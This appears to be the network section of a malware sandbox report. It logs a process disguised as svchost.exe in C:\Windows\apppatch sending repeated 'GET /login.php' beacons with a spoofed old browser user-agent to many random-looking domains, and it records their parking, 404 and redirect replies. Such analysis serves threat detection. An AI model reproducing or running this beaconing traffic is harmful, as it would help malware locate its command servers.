                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3bh7cbQWS%2FBAMJrT9jMGafrcsJUn58NQIW2hpwFsPnEXVRDdPa17voRxKxvnKVpW8qkNuPdZUNtOmasIv4xxTe06JGx3%2FvvhZVkO9g%2BWYrk9OjQA3sb9No%2FSfObsoA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ff9e48d353905-YYZ
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11720&sent=11&recv=13&lost=0&retrans=0&sent_bytes=2924&recv_bytes=972&delivery_rate=367668&cwnd=4&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49710 | 199.59.243.227 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:05.126470089 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: vojyqem.com
Nov 11, 2024 18:24:05.552552938 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          date: Mon, 11 Nov 2024 17:24:05 GMT
                                                                                                                                                                                                          content-type: text/html; charset=utf-8
                                                                                                                                                                                                          content-length: 1094
                                                                                                                                                                                                          x-request-id: 244ca17e-8cf9-4dfe-af64-36b71a041679
                                                                                                                                                                                                          cache-control: no-store, max-age=0
                                                                                                                                                                                                          accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                          critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                          vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==
                                                                                                                                                                                                          set-cookie: parking_session=244ca17e-8cf9-4dfe-af64-36b71a041679; expires=Mon, 11 Nov 2024 17:39:05 GMT; path=/
                                                                                                                                                                                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
Nov 11, 2024 18:24:05.552577019 CET | 528 | IN |
                                                                                                                                                                                                          Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjQ0Y2ExN2UtOGNmOS00ZGZlLWFmNjQtMzZiNzFhMDQxNjc5IiwicGFnZV90aW1lIjoxNzMxMzQ1ODQ1LCJwYWdlX3VybCI6I


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.8 | 49711 | 208.100.26.245 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:05.147332907 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyvyxor.com
Nov 11, 2024 18:24:05.597573996 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:05 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 580
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:24:05.606056929 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyvyxor.com
Nov 11, 2024 18:24:05.709156990 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:05 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 580
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:24:26.829626083 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyvyxor.com
Nov 11, 2024 18:24:26.932585001 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:26 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 580
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:24:26.994374990 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyvyxor.com
Nov 11, 2024 18:24:27.365720034 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:27 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 580
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:24:27.368010998 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:27 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 580
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.8 | 49712 | 3.94.10.34 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:05.152641058 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lymyxid.com
Nov 11, 2024 18:24:05.579682112 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:05 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: btst=b0c92c07333a979010e875aeecca3d34|66.23.206.109|1731345845|1731345845|0|1|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                          Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.8 | 49713 | 75.2.71.199 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:05.154633999 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: puzylyp.com
Nov 11, 2024 18:24:05.580854893 CET | 166 | IN | HTTP/1.1 308 Permanent Redirect
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Location: https://puzylyp.com/login.php
                                                                                                                                                                                                          Server: Caddy
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:05 GMT
                                                                                                                                                                                                          Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.8 | 49715 | 44.221.84.105 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:05.159543991 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: vocyzit.com
Nov 11, 2024 18:24:05.585838079 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:05 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: btst=c77ae2807558c30397c0455df2d7e018|66.23.206.109|1731345845|1731345845|0|1|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                          Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.8 | 49714 | 44.221.84.105 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:05.162389040 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qetyfuv.com
Nov 11, 2024 18:24:05.586096048 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:05 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: btst=4dffefe8b4b97e2649265d7c3c16405e|66.23.206.109|1731345845|1731345845|0|1|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                          Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.8 | 49716 | 23.253.46.64 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:05.446527958 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gahyqah.com
Nov 11, 2024 18:24:05.899446011 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Server: Microsoft-IIS/7.5
                                                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:00 GMT
                                                                                                                                                                                                          Content-Length: 1245
                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
Nov 11, 2024 18:24:05.899545908 CET | 169 | IN | Data Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
                                                                                                                                                                                                          Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.8 | 49717 | 85.17.31.82 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:05.483501911 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gatyfus.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.8 | 49719 | 85.17.31.82 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:05.902012110 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gatyfus.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.8 | 49722 | 13.248.169.48 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:10.113722086 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: pupydeq.com
Nov 11, 2024 18:24:10.543486118 CET | 259 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          Server: openresty
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:10 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 114
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.8 | 49723 | 188.114.97.3 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:10.282461882 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lysyvan.com
Nov 11, 2024 18:24:11.027908087 CET | 795 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:10 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: https://lysyvan.com/login.php
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=49Yp8QEt6EjiDXa15JImklkidiobeNVO2ERpl%2F7WSFSujcMB4mFWVaRBg%2BsYZuD1WUnfge6YjFclRNtzx2yyN3GsUXd02UGQz1XF2yetnApv%2FcCIvWZC9Y7qVG030A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ff96e9e0c0ca6-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1368&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Nov 11, 2024 18:24:11.029441118 CET | 173 | IN | Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Nov 11, 2024 18:24:13.482103109 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lysyvan.com
Nov 11, 2024 18:24:13.833827972 CET | 973 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:13 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: https://lysyvan.com/login.php
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=niDHSYiX0um5%2FJSBRD9aZmXHsLpavJulgGiHScU%2Bs7kqNEEu2ayNNU7eXP4I0Tde33uOuDcsQuLJpUduiTEq5JLYeAtaQkegX%2F64yew7AumYKhbZY0p5y25Ec%2BOhgg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ff9808e740ca6-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1340&sent=5&recv=7&lost=0&retrans=0&sent_bytes=968&recv_bytes=486&delivery_rate=2000921&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
Nov 11, 2024 18:24:13.833839893 CET | 5 | IN | Data Ascii: 0
Nov 11, 2024 18:24:31.294924974 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lysyvan.com
Nov 11, 2024 18:24:31.699342012 CET | 982 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:31 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: https://lysyvan.com/login.php
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hF7G1AF%2BRZzvvCIjztH4%2B%2B%2B8yXXHSYc4nvYVX0mAZNP7BYgZCKfCzc3b6zIl7nxvb1aHFbi9laGlsz4JQtOomUu1qlyN7xrOdt8wpmkrVz6Zo760i8BPwfYwa%2FayOA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ff9efdf7b0ca6-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1326&sent=8&recv=10&lost=0&retrans=0&sent_bytes=1946&recv_bytes=729&delivery_rate=2161194&cwnd=252&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Nov 11, 2024 18:24:34.581680059 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lysyvan.com
Nov 11, 2024 18:24:34.922399998 CET | 981 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:34 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: https://lysyvan.com/login.php
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CYaNhhgdVXRE1SpdoBko1YRP9UJ06%2FqHnMlRvNuvvz01P8i8kG9OzpYZier356YqE%2FsUeoQiT0w7tZzshA3GsW2h37IJDiOXHc%2Bn%2BraEAMwTVtIpqAP7RbPpAhn%2Brw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ffa046e660ca6-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1320&sent=11&recv=13&lost=0&retrans=0&sent_bytes=2928&recv_bytes=972&delivery_rate=2161194&cwnd=4&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.8 | 49724 | 18.208.156.248 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:10.451445103 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
